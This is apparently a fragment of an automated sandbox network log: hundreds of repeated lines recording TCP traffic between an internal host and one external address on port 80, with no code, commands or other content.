                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
